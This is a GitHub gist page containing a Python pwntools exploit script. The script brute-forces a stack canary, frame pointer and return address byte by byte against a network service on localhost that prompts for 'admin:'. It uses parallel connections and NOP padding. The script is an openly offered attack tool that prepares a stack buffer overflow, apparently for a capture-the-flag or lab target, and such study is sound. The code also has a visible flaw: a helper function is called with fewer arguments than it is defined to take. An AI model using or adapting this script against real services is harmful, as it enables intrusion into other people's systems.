-
-
Save nbulischeck/92196deb938a536e17101a887aa11760 to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# -*- coding: utf-8 -*- | |
from pwn import * | |
from multiprocessing import Pool | |
context(os="linux", arch="amd64") | |
HOST, PORT = ("localhost", 10000) | |
canary = '' #p64(0x7c7a4f9b520b8000) | |
frame_ptr = '' #p64(0x7ffefc53f200) | |
ret_ptr = '' #p64(0x558923000502) | |
offset = 0x0 | |
def die(error): | |
log.failure(error) | |
quit() | |
def leak(byte): | |
context.log_level = 'error' | |
r = remote(HOST, PORT) | |
payload = '' | |
payload += "\x90" * offset | |
payload += canary | |
payload += frame_ptr | |
payload += ret_ptr | |
payload += chr(byte) | |
try: | |
r.sendafter("admin:\n", payload, timeout=3) | |
res = r.recvuntil("Done.", timeout=3) | |
context.log_level = 'info' | |
return True | |
except: | |
context.log_level = 'info' | |
return False | |
def leak_helper(l, string): | |
pool = Pool(processes=25) | |
result = pool.map(leak, range(0, 256)) | |
pool.close() | |
pool.terminate() | |
pool.join() | |
if True in result: | |
byte = result.index(True) | |
return string + chr(byte) | |
else: | |
die("Could not find byte!") | |
if not canary: | |
log.info('Brute forcing the stack canary') | |
with log.progress("Found Bytes") as l: | |
for i in p64(0x0): | |
canary = leak_helper(canary) | |
l.status(str([ord(i) for i in canary])) | |
l.success("Done!\nCanary: " + hex(u64(canary))) | |
if not frame_ptr: | |
log.info('Brute forcing the frame pointer') | |
with log.progress("Found Bytes") as l: | |
for i in p64(0x0): | |
frame_ptr = leak_helper(frame_ptr) | |
l.status(str([ord(i) for i in frame_ptr])) | |
l.success("Done!\nFrame Pointer: " + hex(u64(frame_ptr))) | |
if not ret_ptr: | |
log.info('Brute forcing the return pointer') | |
with log.progress("Found Bytes") as l: | |
for i in p64(0x0): | |
ret_ptr = leak_helper(ret_ptr) | |
l.status(str([ord(i) for i in ret_ptr])) | |
l.success("Done!\nReturn Pointer: " + hex(u64(ret_ptr))) |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment